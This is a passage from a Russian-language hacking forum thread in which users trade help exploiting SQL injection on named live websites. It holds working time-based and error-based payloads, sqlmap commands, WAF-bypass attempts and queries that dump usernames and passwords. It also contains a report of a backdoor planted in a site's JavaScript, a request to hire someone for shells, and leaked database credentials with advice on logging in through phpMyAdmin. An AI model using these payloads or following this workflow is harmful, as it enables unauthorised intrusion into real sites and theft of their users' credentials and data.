select count(*) as aggregate from `users` where `referrer_id` = ? and ( `email` like ? or `ip` like ? or concat_ws("", last_name, "", name, "midlle_name") like "%inject here%") and `users`.`deleted_at` is null order by `id` desc limit 20 offset 0

получается если он возвращает 0, то второй запрос (который писал в пред. посте) не выполняется. это вполне обьясняет вот это поведение


FireRidlle said:
↑ (https://antichat.live/posts/4388525/)
?search=com // возвращает строки с `com` ?search=qwerty // нет строк с таким вхождением com") union select 1 -- - // ошибка qwerty") union select 1 -- - // ошиби нет, ничего не возвращает



есть варианты как можно обойти ситауцию когда иньекция попадает в два запроса с раным количеством колонок и все же воспользоватся union based

или мб есть способ как в sql из колонок сделать строки


Code:
") or id in(select ascii(substring(pass,1,1)),ascii(substring(pass,2, 1)),ascii(substring(pass,3,1)) from users where id=xxxx)

FireRidlle said:
↑ (https://antichat.live/posts/4388581/)
есть варианты как можно обойти ситауцию когда иньекция попадает в два запроса с раным количеством колонок и все же воспользоватся union based


Есть как минимум два уязвимых запроса, а может быть три или больше, случай не простой, есть над чем подумать и развернуться. Стоит посмотреть в сторону фрагментированных инъекций или объединённых запросов, варианты есть и пока они не проверены, утверждать однозначно нельзя. В текущем состоянии дел, всё сильно зависит от окружения, контекста и соответсвенно выбранного вектора атаки. Думаю, что на этом моменте, не имеет смысла описывать абстракные техники, уже не целесообразно, нужно работать с конкретным случаем напрямую.

Это что касается инъекции, но вполне возможно, что классическая схема SQLi => Admin => RCE, в данном случае будет куда предпочтительнее, чем просто видимая скуля.

https://i.ibb.co/CHgK7MK/2.jpg

SQLi в Oracle с подлючением все нормально

Есть возможность обойти?


Code:
$dir = './img/';
$name = $dir . basename($_FILES['uploadfile']['name']);

$ext = substr($_FILES['uploadfile']['name'],strpos($_FILES['uploadfile']['name'],'.'),strlen($_FILES['uploadfile']['name'])-1);
$filetypes = array('.bmp','.jpg','.png','.jpeg','.gif','.BMP',' .JPG','.PNG','.JPEG','.GIF');

if(!in_array($ext,$filetypes)){
echo "Данный формат файлов не поддерживается";
}else{
if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $name)) {
echo "Изображение загружено";
} else {
echo "Ошибка";
}
}

Здравствуйте, помогите пожалуйста извлечь пароли, никак не получается (пароли идут blob)


Code:
doma-pizza.ru/admin/login/
поле login
admin') AND EXTRACTVALUE(7257,CONCAT(0x5c,0x717a7a7871,(SELECT (ELT(7257=7257,1))),0x717a787671)) AND ('sIKG'='sIKG&password=admin&submit=%D0%92%D1%85%D0%BE%D0%B4

back-end DBMS: MySQL >= 5.0.0
banner: '5.7.21-20-beget-5.7.21-20-1-log'

Таблица: PS_USER
Колонки: PS_USER_LOGIN,PS_USER_PASSWORD

Пробовал так как тут указывали, но ничего не вышло

/threads/431199/page-53#post-4390194 (https://antichat.live/threads/431199/page-53/)

Всем привет. Нужен рутальщик для лома/шелов ссылок.

Телеграм: @santa_moonride

CrispyChikHotty said:
↑ (https://antichat.live/posts/4390499/)
Нужен рутальщик


нормального рутальщика щас хрен где найдёшь!

ms13 said:
↑ (https://antichat.live/posts/4390500/)
нормального рутальщика щас хрен где найдёшь!


Буду надеяться, что он сам меня найдёт : D

Не подскажите, есть сайт на ColdFusion 2018, два дня назад поставил свой код в js файл, проблема в том, что мой код то появляется, то его нету это со стороны обычного пользователя. Попытался 10 раз обновить страницу его нет, зашел на следующий день код есть. А если через шелл чекнуть то мой код постоянно в файле. Не понял истинную причину такого поведения. Вроде сайт на одном сервере, кэш сервера - прошло достаточно времени, кэш бразуера - я его постоянно чищу

Всем привет. Возник вопрос.

Есть запрос вида


Code:
https://site/dynamic/pin/?pin=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb bbbbbbbbbbbbbbbbbbbbbbb&activate=1

Получаю ошибку:


Code:
SQLSTATE[42000]: Syntax error or access violation: 3057 Incorrect user-level lock name 'WP_bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb bbbbbbbbbbbbbbbbbbbbbb'

Гугление ошибки привело к тому, что возможно я имею дело с функцией GET_LOCK() в mysql. И возможен такой вектор:


Code:
(concat(version(),repeat(0x1,99)),0)

Но к сожалению у меня не получается правильно составить запрос. Как отбросить префикс базы, который вываливается в ошибке и корректно составить запрос?

Спасибо, буду признателен за помощь.

Вопрос все еще актуален, есть у кого-нибудь идеи?

pinch said:
↑ (https://antichat.live/posts/4391331/)
Вопрос все еще актуален, есть у кого-нибудь идеи?


Сам сервер на бэке один ? Балансировка какого-нибудь нету ?

отписал в пм, также бэкдор который поставил на php файл (находится на соседней папке) нормально работает, а вот с js такие проблемы

Опять ваф, помогите обойти, фильт union select


Code:
https://www.lfv.li/nationalmannschaften/u21-nationalmannschaft/mannschaft/detail/?tx_cfcleagueext_pi4%5BprofileId%5D=2057+union+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+--+

Нужна помощь

В коде сайта есть код на привязку кошелька

Работает он примерно так:


Code:
SELECT COUNT(*) FROM db_purse WHERE purse1='{$_GET["purse"]}'

Если кошелёк не найден то выполняеться запрос


Code:
UPDATE db_purse SET purse1='{$_GET["purse"]}' WHERE user_id='$id'

Но установить purse1 меня не устрайвает в таблице есть ещё purse2 и purse3, есть ли какаето возможность сформировать $_GET["purse"] таким образом чтобы подменить purse2 или purse3?

Попробуй сначала составить ЖЕЛАЕМЫЙ запрос, который приведет к изменению значения поля, при этом не меняя исходный, а только дополняя его. После этого станет понятно, что модифицировать.

Приветствую! Помогите правильно составить POST запрос для sqlmap


Code:
bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22X OR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&player-leagie-box=on&silver=on

aberkroft said:
↑ (https://antichat.live/posts/4391961/)
Попробуй сначала составить ЖЕЛАЕМЫЙ запрос, который приведет к изменению значения поля, при этом не меняя исходный, а только дополняя его. После этого станет понятно, что модифицировать.


Я сильно в этом не шарю но всё что перепробывал мне не помогло

troni900 said:
↑ (https://antichat.live/posts/4393407/)
Приветствую! Помогите правильно составить POST запрос для sqlmap

Code:
bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22X OR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&player-leagie-box=on&silver=on



Get

Sqlmap.py --url "site.com/index.php?

bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=*&player-leagie-box=on&silver=on" --dbs --risk=3 --level=3 --random-agent

Post

Sqlmap.py --url "site.com/index.php" --data="

bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=*&player-leagie-box=on&silver=on" --dbs --risk=3 --level=3 --random-agent

Суд по всему это выхлоп с акуши, так что я бы сильно не надеялся раскрутить,ещё к тому же слепую, дампится будет хрен пойми сколько, без шела никак

акуша)

Помогите пожалуйста, возвращает пустой результат


Code:
--url="https://eos.aidainternational.org/ResetPassword/3297bc2d-815c-46fd-9488-57433cb3de5a*" --flush-session --risk=3 --level=3 -D dbo -T UserProfiles --dump

Привет.

Подскажите, плиз.

Как правильно видоизменить нагрузку вида


Code:
'OR(if(now()=sysdate(),sleep(3),0))OR'*/

для того чтобы начать перебирать символы, например, чтобы получить значение


Code:
version()

базы данных.

Не хватает понимания

По идее так


Code:
'OR(if(substring(version((),1,1)='m',sleep(3),0))O R'*/

, да?

Cпасибо.

testvalue said:
↑ (https://antichat.live/posts/4396917/)
Привет.
Подскажите, плиз.
Как правильно видоизменить нагрузку вида

Code:
'OR(if(now()=sysdate(),sleep(3),0))OR'*/

для того чтобы начать перебирать символы, например, чтобы получить значение

Code:
version()

базы данных.
Не хватает понимания
Cпасибо.


Что-бы узнать имеет-ли 2-ой символ значение 'A':


Code:
'OR(if(substring(version(),2,1)='А'),sleep(3),0)) OR'*/

ещё лучше перебирать по ASCII (53='5') т.е. является ли 2ой символ цифрой 5:


Code:
'OR(if(ASCII(SUBSTR(VERSION(),2,1))=53),sleep(3),0 ))OR'*/

Спасибо большое, дружище, сейчас пойду пробовать

crlf said:
↑ (https://antichat.live/posts/4388089/)
Оригинал:
https://blog.malwarebytes.com/threat-analysis/2020/05/credit-card-skimmer-masquerades-as-favicon/
Cервер отдавал JS только при "правильных" реферах, иначе выплёвывалась картинка. Браузер не подгружает левые майм типы для скриптов (script src) и ошибок никаких не возникает. А сделан сей трик, по всей видимости, для затруднения детекта автоматическими сканерами и анализаторами безопасности.
Статья немного вводит в заблуждение


Оказалось немного иначе, но смысл как раз в затруднении детекта.

Подробный разбор:

https://blog.malwarebytes.com/threa...ata-exfiltrates-credit-cards-via-image-files/ (https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/)

Опус от автора техники:

https://xss.is/threads/39071/

Какие шеллы сейчас актуальны?

Привет.

Помогите докрутить скулю и обойти WAF.

https://www.hbo.ro/TitleDetail.aspx?ScheduleId='OR(if(now()=sysdate() ,sleep(5),0))OR'xxx -> True, задержка 5 секунд

На sleep() реагирует, и видно, что там есть скуля, но при попытке извлечь например, version() или user() cудя по всему срабатывает WAF.

Пытался через вектор 'OR(if(ASCII(SUBSTR(VERSION(),1,1))=53),sleep(3),0 ))OR', но облом.

Спасибо.

Помогите раскрутить, все идёт с запроса в LIKE


Code:
https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22

DezMond™ said:
↑ (https://antichat.live/posts/4401293/)
Помогите раскрутить, все идёт с запроса в LIKE

Code:
https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22





Code:
https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22/**/or/**/(extractvalue(0x0a,concat(0x0a,(select(group_conca t(concat_ws(0x3a,username,password)))from(be_users )))))=%22

здравствуйте. вопрос по валидации числовых параметров. есть параметр page. если передать 1' то возвращает первую страницу, 1" так же, 2-1 то вторую страницу. -1 ошибка. можно что что сделать?

fandor9 said:
↑ (https://antichat.live/posts/4396918/)
'OR(if(ASCII(SUBSTR(VERSION(),2,1))=53),sleep(3),0 ))OR'*/


еще можно не сравнением а бинарным поиском через >= к примеру если хочешь знаешь что только цифры


Code:
'OR(if(ASCII(SUBSTR(VERSION(),2,1))>=53),sleep(3),0))OR'*

сработало, то берем среднее число из диапазона между 53 и 57, к примеру >=55. не сработало значит чекаешь 53,54. если сработало то 55,56,57. очень ускоряет когда нужно искать цифры и буквы в разном регистре

FireRidlle said:
↑ (https://antichat.live/posts/4401629/)
можно что что сделать?


99.9% - ничего. В случае PHP, может выглядеть так:


Code:
var_dump(intval("1'"));
var_dump(intval("2-1"));
var_dump(intval(-1));

int(1) //есть в бд
int(2) //есть в бд
int(-1) //нет такого, ошибка

FireRidlle said:
↑ (https://antichat.live/posts/4401629/)
здравствуйте. вопрос по валидации числовых параметров. есть параметр page. если передать 1' то возвращает первую страницу, 1" так же, 2-1 то вторую страницу. -1 ошибка. можно что что сделать?


если intval вожно большое число 92233720368547758079 +1 , в запрос попадёт 2e+, но это при условии старого пыха

Хелп помогите раскрутить


Code:
https://www.egtexpress.com/cs/zeme/slovinsko"/?no_cache=1

Привет Burp/Acunetix показывает XSS

site.com/ru/?'>alert(1)


Code:
alert(1)' />

Но в браузере происходит URL Encode


Code:


Вопрос есть тут или нет XSS? ведь и за URL Encode ничего не срабатывает.

Как эксплуатировать?

Octavian said:
↑ (https://antichat.live/posts/4409792/)
Привет Burp/Acunetix показывает XSS
site.com/ru/?'>alert(1)

Code:
alert(1)' />

Но в браузере происходит URL Encode

Code:


Вопрос есть тут или нет XSS? ведь и за URL Encode ничего не срабатывает.
Как эксплуатировать?


Юзать разные Tricks

Например для IE работает связка через 'location=URL' в чистом виде

Можно почитать подробнее у BlackFan - https://blog.blackfan.ru/2016/09/ie-location-bug.html

Нашел php code injection на сайте, не ложную. Нашел гайд. Но там на странице авторизации проходит выполнения кода. У меня нет. Кто подскажет как выполнить уязвимость. Могу скинуть со сканера уязвимость

Gutman999 said:
↑ (https://antichat.live/posts/4420200/)
Нашел php code injection на сайте, не ложную. Нашел гайд. Но там на странице авторизации проходит выполнения кода. У меня нет. Кто подскажет как выполнить уязвимость. Могу скинуть со сканера уязвимость


кидай

Прошу прощения. PHP Code Injection


Code:
PHP code injection

Vulnerability description

This script is vulnerable to PHP code injection.

The vulnerability affects https://www.site.de/widget.php , 7521

Discovered by /Scripts/PerScheme/PHP_Code_Injection.script

Attack details

JSON input 7521 was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8

HTTP request

POST /widget.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: language=0;sid=v8o8b0le02vr097h6vbfes1cd0;sid_key= oxid;cookieConsent=functional,marketing;bie_sCooki eListId=dbb53ee616bcb82137ffd68e1d0e2f38;ga-disable-UA-27119953-1=true;tc_cj_v2=_rn_lh%5BfyfcheZZZ222H%7B%7D0%29%2 0/%243G-%20%21%20--%20-H%7D*%28ZZZKPJKNQLLLJOMKZZZ%5D;tCdebugLib=1;tc_cus tom_campaign=EXTERNAL_LINK@@@www.acunetix-referrer.com@@@1601474230887;tc_custom_cj=;tc_Bask etFreeseSession=1;emos_jcvid=AXTfJhMocd6e1u6fAeE6k lz_afKVWU7V:1:0:0:0:true:1
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 309
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

actcontrol=celebros&&cl=marm_klfilter_widget&filterForm[size][]=%24{%40print(md5(acunetix_wvs_security_test))}&fnc=submitFilterForm&listtype=qwiser&parentView=celebros&searchHandle=UVQxMGFHVl9RajEwYUdWX1J6MDNOVEl4WGpGX 1NUMXdjbWxqWlg1TFBUUl9URDB4ZmswOU1YNU9QVE5f&searchparam=the&sortAscending=1&sortFieldName=1

Также есть GET запрос
URL encoded GET input searchparam was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8
HTTP request

GET /index.php?search=&cl=celebros&searchparam=%24{%40print(md5(acunetix_wvs_security _test))} HTTP/1.1
Connection: keep-alive
Cookie: language=0;sid=inoaht3jja8trerg9gr98il824;sid_key= oxid;cookieConsent=functional,marketing;bie_sCooki eListId=dbb53ee616bcb82137ffd68e1d0e2f38
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Gutman999 said:
↑ (https://antichat.live/posts/4420326/)
Прошу прощения. PHP Code Injection

Code:
PHP code injection

Vulnerability description

This script is vulnerable to PHP code injection.

The vulnerability affects https://www.site.de/widget.php , 7521

Discovered by /Scripts/PerScheme/PHP_Code_Injection.script

Attack details

JSON input 7521 was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8

HTTP request

POST /widget.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: language=0;sid=v8o8b0le02vr097h6vbfes1cd0;sid_key= oxid;cookieConsent=functional,marketing;bie_sCooki eListId=dbb53ee616bcb82137ffd68e1d0e2f38;ga-disable-UA-27119953-1=true;tc_cj_v2=_rn_lh%5BfyfcheZZZ222H%7B%7D0%29%2 0/%243G-%20%21%20--%20-H%7D*%28ZZZKPJKNQLLLJOMKZZZ%5D;tCdebugLib=1;tc_cus tom_campaign=EXTERNAL_LINK@@@www.acunetix-referrer.com@@@1601474230887;tc_custom_cj=;tc_Bask etFreeseSession=1;emos_jcvid=AXTfJhMocd6e1u6fAeE6k lz_afKVWU7V:1:0:0:0:true:1
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 309
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

actcontrol=celebros&&cl=marm_klfilter_widget&filterForm[size][]=%24{%40print(md5(acunetix_wvs_security_test))}&fnc=submitFilterForm&listtype=qwiser&parentView=celebros&searchHandle=UVQxMGFHVl9RajEwYUdWX1J6MDNOVEl4WGpGX 1NUMXdjbWxqWlg1TFBUUl9URDB4ZmswOU1YNU9QVE5f&searchparam=the&sortAscending=1&sortFieldName=1

Также есть GET запрос
URL encoded GET input searchparam was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8
HTTP request

GET /index.php?search=&cl=celebros&searchparam=%24{%40print(md5(acunetix_wvs_security _test))} HTTP/1.1
Connection: keep-alive
Cookie: language=0;sid=inoaht3jja8trerg9gr98il824;sid_key= oxid;cookieConsent=functional,marketing;bie_sCooki eListId=dbb53ee616bcb82137ffd68e1d0e2f38
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21



а хост какой?

хелп http://www.ashdesign.com/downloads/download-file.asp?id=15&dir=download' (http://www.ashdesign.com/downloads/download-file.asp?id=15&dir=download%27)

man474019 said:
↑ (https://antichat.live/posts/4423049/)
Hi
Can you help me to bypass Trustwave WAF here ?
Spoiler: target link
https://rezume.am/?filter_id[0]=5' (https://rezume.am/?filter_id[0]=5%27)
I can get only DB name with sqlmap, can not get tables and columns name.
Thanks !


Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

Mod_Security bypass

/threads/425295/ (https://antichat.live/threads/425295/)

Привет всем, не знаете, в какой таблице хранится url адрес сайта в Drupal?

Добрый день, в форме которая отправляется на сервер ajax запросом если добавить одинарную кавычку в нике в ответе вываливает такая ошибка, установлен openCart.


Code:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1991-01-01' WHERE customer_id = 687013' at line 2
Error No: 1064
UPDATE oc_customer SET fio = 'Имя Фамилия', firstname = 'Имя', lastname = 'Фамилия', telephone = '11111111111', patronymic = '', nickname = ''', birthday = '1991-01-01' WHERE customer_id = 687013

Возможно ли как то провести sql иньекцию? Проблема в том что если запрос выполнится без ошибок в ответе будет json объект который вернет что то типа {"status":"ok"}

Попытался просто видоизменить конец запроса, но комментарий -- # /* не отрабатывает

тоже вываливается в ошибку

.SpoilerTarget" type="button">Spoiler: Изображение
https://i.ibb.co/Dg56sVm/1.jpg (https://ibb.co/5xBztMC)

Forserer said:
↑ (https://antichat.live/posts/4427362/)
Добрый день, в форме которая отправляется на сервер ajax запросом если добавить одинарную кавычку в нике в ответе вываливает такая ошибка, установлен openCart.

Code:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1991-01-01' WHERE customer_id = 687013' at line 2
Error No: 1064
UPDATE oc_customer SET fio = 'Имя Фамилия', firstname = 'Имя', lastname = 'Фамилия', telephone = '11111111111', patronymic = '', nickname = ''', birthday = '1991-01-01' WHERE customer_id = 687013

Возможно ли как то провести sql иньекцию? Проблема в том что если запрос выполнится без ошибок в ответе будет json объект который вернет что то типа {"status":"ok"}
Попытался просто видоизменить конец запроса, но комментарий -- # /* не отрабатывает
тоже вываливается в ошибку
Spoiler: Изображение
https://i.ibb.co/Dg56sVm/1.jpg (https://ibb.co/5xBztMC)


Вы можете попробовать


Code:
nickname=',birthday=(SELECT IF(0=1,'2020-02-20','1111-11-11')) WHERE customer_id=687013;--

и если скуля срабатывает, то как дата рождения будет стоять "1111-11-11", потом уже можно будет делать блайнд с задержнкой или данные в дату рождения записывать, в обшем пару вариантов есть.

fandor9 said:
↑ (https://antichat.live/posts/4427374/)
Вы можете попробовать

Code:
nickname=',birthday=(SELECT IF(0=1,'2020-02-20','1111-11-11')) WHERE customer_id=687013;--

и если скуля срабатывает, то как дата рождения будет стоять "1111-11-11", потом уже можно будет делать блайнд с задержнкой или данные в дату рождения записывать, в обшем пару вариантов есть.


забыл сказать что ник имеет ограничение на количество символов поэтому там не пройдет такой вариант точно, но вот в дате ограничения видимо нет, попробовал в ней все равно так же ругается

.SpoilerTarget" type="button">Spoiler: Изображение
https://i.ibb.co/72qH0Kw/2.jpg (https://ibb.co/Qr4ZxM2)

Forserer said:
↑ (https://antichat.live/posts/4427394/)
забыл сказать что ник имеет ограничение на количество символов поэтому там не пройдет такой вариант точно, но вот в дате ограничения видимо нет, попробовал в ней все равно так же ругается
Spoiler: Изображение
https://i.ibb.co/72qH0Kw/2.jpg (https://ibb.co/Qr4ZxM2)


попробуйте в конце


Code:
;-- а

так что-бы между двумя минусами и а был пробел. может быть что перед передачей в параметрах отрезают с помощью trim (https://www.php.net/manual/en/function.trim.php) пробелы в конце. а два минуса без пробела, это как два ноля без единицы -- ничто А так если в конце параметра будет стоять что-то кроме пробела, то трим не срабатывает и пробел остаётся в параметре, который идёт в скуль.

fandor9 said:
↑ (https://antichat.live/posts/4427395/)
попробуйте в конце

Code:
;-- а

так что-бы между двумя минусами и а был пробел. может быть что перед передачей в параметрах отрезают с помощью
trim (https://www.php.net/manual/en/function.trim.php)
пробелы в конце. а два минуса без пробела, это как два ноля без единицы -- ничто
А так если в конце параметра будет стоять что-то кроме пробела, то трим не срабатывает и пробел остаётся в параметре, который идёт в скуль.



.SpoilerTarget" type="button">Spoiler: Изображение
https://i.ibb.co/XVcNQcK/3.jpg (https://ibb.co/st8kf8N)
что то не понимаю почему комментирование не срабатывает

Forserer said:
↑ (https://antichat.live/posts/4427400/)
Spoiler: Изображение
https://i.ibb.co/XVcNQcK/3.jpg (https://ibb.co/st8kf8N)
что то не понимаю почему комментирование не срабатывает


Попробуйте добавить одинарную кавычку в конце


Code:
;-- а'

fandor9 said:
↑ (https://antichat.live/posts/4427401/)
Попробуйте добавить одинарную кавычку в конце

Code:
;-- а'



кавычка добавляется в запрос но ошибка та же самая, как будто комментарий не распространяется именно на выражение WHERE customer_id = 687013, если оно находится на другой строке или это не важно в данном случае?

так, а как доработать вот такой запрос для получения какой либо инфы через UNION


Code:
SELECT h.* From oc_help h LEFT JOIN `oc_help_to_blog` htb USING (help_id) WHERE htb.blog_id = 4612

Forserer said:
↑ (https://antichat.live/posts/4427362/)
Попытался просто видоизменить конец запроса, но комментарий -- # /* не отрабатывает
тоже вываливается в ошибку


На скрине видна ошибка только в случае многострочного комментария, который должен быть закрыт по спецификации синтаксиса.


Forserer said:
↑ (https://antichat.live/posts/4427362/)
Возможно ли как то провести sql иньекцию?


Не вижу проблем, почему нельзя использовать lastnameещё раз и просто вклиниться в запрос не прибегая к комментированию, примерно таким образом:


Code:
xxx', lastname = @@version, firstname = 'xxx

При этом превое значение lastname должно быть проигнорировано.


Forserer said:
↑ (https://antichat.live/posts/4427431/)
так, а как доработать вот такой запрос для получения какой либо инфы через UNION


Маны по MySQLi вам в помощь:

//threads/43966/ (https://antichat.live/threads/43966/)

https://rdot.org/forum/showthread.php?t=124

https://rdot.org/forum/showthread.php?t=60

Не стоит брезговать, по причине давних дат публикации материалов, с тех времён кардинально ничего не поменялось. В случае непоняток, всегда можно уточнить здесь, а не просить раскручивать за ваc простейшие инъекции в запросах выборки.

Forserer said:
↑ (https://antichat.live/posts/4427431/)
так, а как доработать вот такой запрос для получения какой либо инфы через UNION

Code:
SELECT h.* From oc_help h LEFT JOIN `oc_help_to_blog` htb USING (help_id) WHERE htb.blog_id = 4612



В таком запросе получилось только через ошибку вывести данные, прямого вывода на страницу нету видимо, но в таком запросе не получится сделать через ошибку INSERT или UPDATE ?

Такой вариант не работает. База 10.3.9-MariaDB


Code:
SELECT h.* From oc_help h LEFT JOIN `oc_help_to_blog` htb USING (help_id) WHERE htb.blog_id = 4612; UPDATE ...

Парни,привет! есть вот такая инфа,подскажите пожалуйста и если можно,то прям тыкните носом в строчки,что можно с этим сделать?

если я правильно понимаю,то это ключи от БД логином и паролем..как это можно использовать и через какие проги..у меня на уме только бурп..

.SpoilerTarget" type="button">Spoiler: данные
nRe]EhlT[');

define('LOGGED_IN_KEY', '?@]WrjTLAChQ}ndj}r%6ry`9{>naV,`%`&9!Lm{}wa@PY^Y=f@)QExv1mM]X6Lkk');

define('NONCE_KEY', 'J$+y?FTAc@D6)?w j!(cy&Uw|A!((@?gz^ xj{9jLlI3X-p*J!-1)Qc$h/fxhR>N');

define('AUTH_SALT', 'uc8K{*v$8{V?}hqlwjbJabr+ cYSv[N=wU0qooX]QdG^R?BTL{xSU&WD+oefQ:K;');

define('SECURE_AUTH_SALT', 'Hi+|oN@oSZ*n}O4L-bB&pr:5 ;$;HjMX!RQf}Vv*1J R|5e~-SKjINvPbbL#q6D,');

define('LOGGED_IN_SALT', '4pQD.YnB~dbh-vC4xW}.L@`Km_{uC+

Любым mysql-клиентом к базе подключиться, однако сдается мне, что mysql-сервер слушает только на localhost, а доступа к этому самому localhost Вы не имеете.

[QUOTE="anton liga"]
anton liga said:
↑ (https://antichat.live/posts/4440553/)
Парни,привет! есть вот такая инфа,подскажите пожалуйста и если можно,то прям тыкните носом в строчки,что можно с этим сделать?
если я правильно понимаю,то это ключи от БД логином и паролем..как это можно использовать и через какие проги..у меня на уме только бурп..
Spoiler: данные
nRe]EhlT[');
define('LOGGED_IN_KEY', '?@]WrjTLAChQ}ndj}r%6ry`9{>naV,`%`&9!Lm{}wa@PY^Y=f@)QExv1mM]X6Lkk');
define('NONCE_KEY', 'J$+y?FTAc@D6)?w j!(cy&Uw|A!((@?gz^ xj{9jLlI3X-p*J!-1)Qc$h/fxhR>N');
define('AUTH_SALT', 'uc8K{*v$8{V?}hqlwjbJabr+ cYSv[N=wU0qooX]QdG^R?BTL{xSU&WD+oefQ:K;');
define('SECURE_AUTH_SALT', 'Hi+|oN@oSZ*n}O4L-bB&pr:5 ;$;HjMX!RQf}Vv*1J R|5e~-SKjINvPbbL#q6D,');
define('LOGGED_IN_SALT', '4pQD.YnB~dbh-vC4xW}.L@`Km_{uC+nRe]EhlT[');
define('LOGGED_IN_KEY', '?@]WrjTLAChQ}ndj}r%6ry`9{>naV,`%`&9!Lm{}wa@PY^Y=f@)QExv1mM]X6Lkk');
define('NONCE_KEY', 'J$+y?FTAc@D6)?w j!(cy&Uw|A!((@?gz^ xj{9jLlI3X-p*J!-1)Qc$h/fxhR>N');
define('AUTH_SALT', 'uc8K{*v$8{V?}hqlwjbJabr+ cYSv[N=wU0qooX]QdG^R?BTL{xSU&WD+oefQ:K;');
define('SECURE_AUTH_SALT', 'Hi+|oN@oSZ*n}O4L-bB&pr:5 ;$;HjMX!RQf}Vv*1J R|5e~-SKjINvPbbL#q6D,');
define('LOGGED_IN_SALT', '4pQD.YnB~dbh-vC4xW}.L@`Km_{uC+

anton liga said:
↑ (https://antichat.live/posts/4440553/)
Парни,привет! есть вот такая инфа,подскажите пожалуйста и если можно,то прям тыкните носом в строчки,что можно с этим сделать?
если я правильно понимаю,то это ключи от БД логином и паролем..как это можно использовать и через какие проги..у меня на уме только бурп..
Spoiler: данные
define('DB_NAME', 'rtik_wke58w5ehjrkew5u');
/** MySQL database username */
define('DB_USER', 'rtik_cucok507');
/** MySQL database password */
define('DB_PASSWORD', 'dkjfy538i235rkewnfkwe57j56');
/** MySQL hostname */
define('DB_HOST', 'localhost');


Этим данным уже лет 7+

.SpoilerTarget" type="button">Spoiler: 2015
gerkatinsolo.or.id/wp-content/uploads/fgallery/config/ (http://gerkatinsolo.or.id/wp-content/uploads/fgallery/config/)

file60 источник

Если db_host = localhost

Проверяем интересуемые порт(ы) служб на доступность + возможность коннекта


Code:
sudo nmap -v -v -sS -Pn -p3306 0.0.0.0

Если порты закрыты или ограничены для подключения, отправляемся на поиске панельки.

В 90% залетаем на ура, если имеем актуальные кредсы и панельку управления СУБД.

Ищем директории phpmyadmin/pma/phpadmin, adminer.php и так далее в разных вариациях.

Экономим время путем установки хостера и дефолт путей/конфигов данных хостеров:

.SpoilerTarget" type="button">Spoiler: default_host


Code:
Хостинг-провайдер Значение DB_HOST
1and1 db12345678
AN Hosting localhost
A Small Orange localhost
BlueHost localhost
DreamHost mysql.example.com
GoDaddy h41mysql52.secureserver.net
HostGator localhost
HostICan localhost
ICDSoft localhost:/tmp/mysql5.sock
LaughingSquid localhost
MediaTemple/Grid internal-db.s44441.gridserver.com
one.com localhost
pair Networks dbnnnx.pair.com
Rackspace Cloud mysql50-01.wc1.dfw1.stabletransit.com
Yahoo mysql
Сервера с cPanel localhost
Сервера с Plesk localhost
Сервера с DirectAdmin localhost
Tophost.it sql.your-domain-name.it
Sprinthost.ru localhost


.SpoilerTarget" type="button">Spoiler: Public PMA links
// Зависит от сервера размещен сайт:

beget.com https://dock2.beget.com/phpMyAdmin https://digger.beget.com/phpMyAdmin

hc.ru https://phpmyadmin.hc.ru

ihc.ru https://myadmin.ihc.ru/

